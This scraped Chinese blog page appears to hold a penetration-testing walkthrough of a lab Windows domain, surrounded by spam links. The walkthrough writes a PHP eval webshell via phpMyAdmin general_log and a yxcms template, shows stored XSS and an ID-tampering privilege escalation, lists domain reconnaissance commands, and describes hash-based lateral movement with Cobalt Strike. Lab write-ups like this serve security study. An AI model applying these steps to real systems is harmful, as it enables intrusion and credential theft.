当前位置: 首页 > news >正文

长沙 建网站网站系统开发

长沙 建网站,网站系统开发,做外贸学英语的网站,电脑做网站一、环境搭建 主机 ip地址 win7外网服务器(两张网卡) 外网:192.168.92.135 内网:192.168.52.143 server2003域成员主机 内网:192.168.52.141 server2008域空主机 内网:192.168.52.138 kali攻击机 …

一、环境搭建

主机

ip地址

win7外网服务器(两张网卡)

外网:192.168.92.135

内网:192.168.52.143

server2003域成员主机

内网:192.168.52.141

server2008域空主机

内网:192.168.52.138

kali攻击机

外网:192.168.92.129

网卡配置

win7使用两张网卡

server2003、server2008

二、信息收集

  1. 端口扫描

Nmap scan report for 192.168.92.135

80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)

3306/tcp open mysql MySQL (unauthorized)

  1. 铭感目录

phpinfo.php、phpmyadmin、yxcms

三、漏洞发现

(一) phpMyAdmin

通过phpmyadmin getshell的方法:phpMydmin的GetShell思路 - FreeBuf网络安全行业门户

弱口令root:root进入后台

通过 select @@datadir;命令得到了物理路径

我们查看secure_file_priv是否为NULL,如果是NULL则无法创建文件

还可以使用日志写入木马,使用 show variables like '%general%';命令查看日志全局变量

使用 set global general_log = "ON";命令开启日志保存,使用set global general_log_file = "C:/phpstudy/WWW/log.php"; 命令更改日志保存路径

使用 select '<?php eval($_POST[pwd]); ?>';命令写入木马

使用蚁剑连接成功

(二) yxcms

1. 主页文件写入木马

通过公告信息发现后台地址默认账号密码

通过弱口令登录成功,在前台模板,编辑首页文件

写入木马

连接成功

2. 存储型XSS

  1. 评论区造成XSS
    在留言版中输入弹窗语句

当后台访问留言版的时候就会弹窗

如果审核通过主页访问留言板也会弹窗

  1. 文件上传pdf造成xss,这里还可以上传flash文件也可以造成xss

访问这个pdf文件地址弹窗

3. 水平越权

注册两个会员用户

在资料完善中

抓包发现id=3我们修改成2

test1账号的资料成功被修改

四、内网渗透

(一) 信息收集

cs生成木马上传蚁剑

ipconfig /all            # 查看本机ip,所在域
route print              # 打印路由信息
arp -a                   # 查看arp缓存
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

先设置间隔时间为0(真实环境默认就好,越快的话就越容易暴露)

shell systeminfo

net config Workstation发现本机是工作站

net view 查看局域网内其他主机名

通过cs得到hash值及明文密码

(二) 横向渗透

在视图查看目标列表

先通过hash值碰撞拿下域控,

创建SMB监听器,选择会话

后面步骤一样的

http://www.ds6.com.cn/news/109530.html

相关文章:

  • 个人业务网站教程数字营销网站
  • 淘宝销售书网站建设方案石家庄关键词优化软件
  • 网站建设背景图片商旅100网页版
  • 湖北省建设厅信息网站兰州网络seo公司
  • 网页版视频网站建设需要多少钱分类信息网站平台有哪些
  • 婺源网站建设wyjcwl杭州上城区抖音seo有多好
  • 简速做网站长沙网站seo哪家公司好
  • wordpress典网站专业术语中seo意思是
  • 如何在百度上推广自己百度搜索优化关键词排名
  • 可信赖的网站建设案例seo赚钱方法大揭秘
  • 做教育网站还挣钱吗博客营销
  • 中国六冶的网站谁做的代写平台在哪找
  • 成都网站设计推广公司有哪些公司
  • 哪个视频网站做视频最赚钱的品牌营销策划案例ppt
  • 德州手机网站建设报价海口seo网络公司
  • 做直销建立个人网站好吗泽成杭州seo网站推广排名
  • 大理北京网站建设网络营销经典失败案例
  • 做网站好用的软件360建站官网
  • 国内建站源码推广优化网站排名
  • 深圳如何做网站济南seo怎么优化
  • 五道口网站建设公司苏州百度代理公司
  • 用mui做的网站百度排名优化软件
  • 怎么做网站的图片跳转搜索词和关键词
  • 自己在网上怎么做网站seo优化需要多少钱
  • 我的世界的家怎么做视频网站百度网站首页
  • 人员调动在网站上怎么做seo是什么职位
  • 做软件项目需不需要有网站南京seo公司教程
  • 网站后台要怎么做网站免费推广平台
  • 如何做的网站手机可以用济南网站优化公司排名
  • 兰州优化公司哪个好娄底地seo